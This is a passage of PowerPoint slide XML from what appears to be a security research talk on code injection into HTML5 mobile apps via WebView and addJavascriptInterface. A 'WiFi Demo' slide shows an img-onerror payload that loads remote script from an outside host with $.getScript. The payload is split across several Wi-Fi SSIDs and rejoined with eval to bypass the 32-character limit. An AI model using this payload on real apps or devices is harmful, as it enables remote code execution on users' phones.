                    <a:srgbClr val="000000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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="491" name="Shape 491"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1495549" y="1349813"/>
                <a:ext cx="553116" cy="1754"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="000000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</p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="499" name="Group 499"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="177710" y="306458"/>
              <a:ext cx="1945977" cy="2906098"/>
              <a:chOff x="-2" y="-1"/>
              <a:chExt cx="1945975" cy="2906097"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="495" name="Group 495"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-3" y="-2"/>
                <a:ext cx="1945976" cy="2906098"/>
                <a:chOff x="-1" y="-1"/>
                <a:chExt cx="1945975" cy="2906097"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="493" name="Shape 493"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-2" y="0"/>
                  <a:ext cx="1945976" cy="2906097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ctr">
                    <a:defRPr>
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="494" name="Shape 494"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-2" y="-2"/>
                  <a:ext cx="1945976" cy="28445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34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle>
                  <a:lvl1pPr algn="ctr">
                    <a:defRPr b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr sz="1800" b="0"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="1400" b="1"/>
                    <a:t>WebView</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="498" name="Group 498"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="176154" y="599673"/>
                <a:ext cx="1508773" cy="2117426"/>
                <a:chOff x="-1" y="-1"/>
                <a:chExt cx="1508772" cy="2117425"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="496" name="Shape 496"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-2" y="-2"/>
                  <a:ext cx="1508774" cy="2117426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C2F2"/>
                    </a:gs>
                    <a:gs pos="43000">
                      <a:srgbClr val="BBDEFF"/>
                    </a:gs>
                    <a:gs pos="93000">
                      <a:srgbClr val="EBF5FE"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="F9FCFE"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="37721" t="-19636" r="62278" b="119636"/>
                  </a:path>
                </a:gradFill>
                <a:ln w="9525" cap="flat">
                  <a:solidFill>
                    <a:srgbClr val="125092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ctr">
                    <a:defRPr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497" name="Shape 497"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-2" y="-1"/>
                  <a:ext cx="1508774" cy="211325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34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:endParaRPr>
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="1400" b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:rPr>
                    <a:t>HTML5</a:t>
                  </a:r>
                  <a:endParaRPr b="1">
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="1400" b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:rPr>
                    <a:t>CSS</a:t>
                  </a:r>
                  <a:endParaRPr b="1">
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:endParaRPr>
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:endParaRPr>
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:endParaRPr>
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:endParaRPr>
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="1400" b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:rPr>
                    <a:t>JavaScript</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="500" name="Shape 500"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1543054" y="2367483"/>
              <a:ext cx="1388749" cy="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501" name="Shape 501"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1543054" y="2264882"/>
              <a:ext cx="5" cy="1026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502" name="Shape 502"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1543054" y="2776018"/>
              <a:ext cx="5" cy="1026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503" name="Shape 503"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2931798" y="2264882"/>
              <a:ext cx="5" cy="1026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504" name="Shape 504"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1543054" y="2788207"/>
              <a:ext cx="5" cy="1026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505" name="Shape 505"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2931798" y="2776016"/>
              <a:ext cx="5" cy="1026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506" name="Shape 506"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2374586" y="132112"/>
              <a:ext cx="5" cy="312396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dash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1543054" y="2776018"/>
              <a:ext cx="1388749" cy="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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="510" name="Group 510"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1543052" y="2181874"/>
              <a:ext cx="1388755" cy="779751"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1388753" cy="779749"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="508" name="Shape 508"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-2" y="185608"/>
                <a:ext cx="1388755" cy="408541"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFD6C3"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="FFE7DB"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFF3EE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  <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:defRPr>
                </a:pPr>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="509" name="Shape 509"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-2" y="-2"/>
                <a:ext cx="1388755" cy="7797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4275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0" algn="ctr">
                  <a:defRPr sz="1800"/>
                </a:pPr>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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lvl="0" algn="ctr">
                  <a:defRPr sz="1800"/>
                </a:pPr>
                <a:r>
                  <a:rPr sz="1400" b="1">
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:rPr>
                  <a:t>addJavascript</a:t>
                </a:r>
                <a:endParaRPr b="1">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr lvl="0" algn="ctr">
                  <a:defRPr sz="1800"/>
                </a:pPr>
                <a:r>
                  <a:rPr sz="1400" b="1">
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:rPr>
                  <a:t>-interface</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="514" name="Group 514"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7637963" y="2322070"/>
            <a:ext cx="334753" cy="2339585"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="334752" cy="2339584"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="512" name="Shape 512"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="-1"/>
              <a:ext cx="334754" cy="2339585"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595959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13" name="Shape 513"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16342" y="163963"/>
              <a:ext cx="302067" cy="20116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4275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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R</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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e</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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s</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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o</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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u</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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r</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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c</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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e</a:t>
              </a:r>
              <a:endParaRPr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  <a:p>
              <a:pPr lvl="0" algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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s</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Shape 515"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6983072" y="3103629"/>
            <a:ext cx="553117" cy="1750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill/>
            <a:round/>
            <a:head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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540326" y="333903"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WiFi Demo (SSID Length Limitation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Shape 518"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518413" y="1224089"/>
            <a:ext cx="8229601" cy="3292081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="449914" indent="-456264">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="2000" i="1"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pPr lvl="0">
              <a:defRPr sz="1800" i="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" i="1"/>
              <a:t>&lt;img src onerror=$.getScript('http://mu.gl')&gt; (need to usejQuery)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4182400" y="1191154"/>
            <a:ext cx="5" cy="540889"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"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20" name="Shape 520"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993646" y="1668565"/>
            <a:ext cx="737759" cy="327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>
            <a:lvl1pPr>
              <a:defRPr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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="image3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80400" y="1691769"/>
            <a:ext cx="497936" cy="535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522" name="image3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80399" y="2349125"/>
            <a:ext cx="497933" cy="535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523" name="image3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70420" y="3039429"/>
            <a:ext cx="497936" cy="535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524" name="image3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80400" y="3747049"/>
            <a:ext cx="497936" cy="535415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="525" name="image3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70420" y="4403923"/>
            <a:ext cx="497936" cy="535415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1890470" y="1903657"/>
            <a:ext cx="3316369" cy="1465254"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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27" name="Shape 527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1913738" y="2564930"/>
            <a:ext cx="3175675" cy="830111"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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28" name="Shape 528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1913738" y="3400590"/>
            <a:ext cx="3175374" cy="44747"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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529" name="image3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5848" y="2927547"/>
            <a:ext cx="810496" cy="994504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Shape 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380088" y="2056637"/>
            <a:ext cx="2598564" cy="500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/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&lt;img src onerror=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1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a="$.getScr“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Shape 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1890469" y="3424794"/>
            <a:ext cx="3316369" cy="680059"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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32" name="Shape 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1913739" y="3475087"/>
            <a:ext cx="3346704" cy="1282923"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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533" name="Shape 533"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774114" y="2569529"/>
            <a:ext cx="2598561" cy="284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/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&lt;img src onerror=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1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b="ipt('ht”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Shape 534"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2722366" y="3128129"/>
            <a:ext cx="2598560" cy="284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/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&lt;img src onerror=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1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c="tp://mu."&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Shape 535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2904894" y="3600972"/>
            <a:ext cx="2598561" cy="284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/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&lt;img src onerror=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1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d="gl')“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Shape 536"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604246" y="3963877"/>
            <a:ext cx="2687328" cy="500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/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&lt;img src onerror=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1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eval(a+b+c+d)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Shape 537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096122" y="2900783"/>
            <a:ext cx="2024748" cy="386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75" tIns="34275" rIns="34275" bIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="210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Each SSID &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
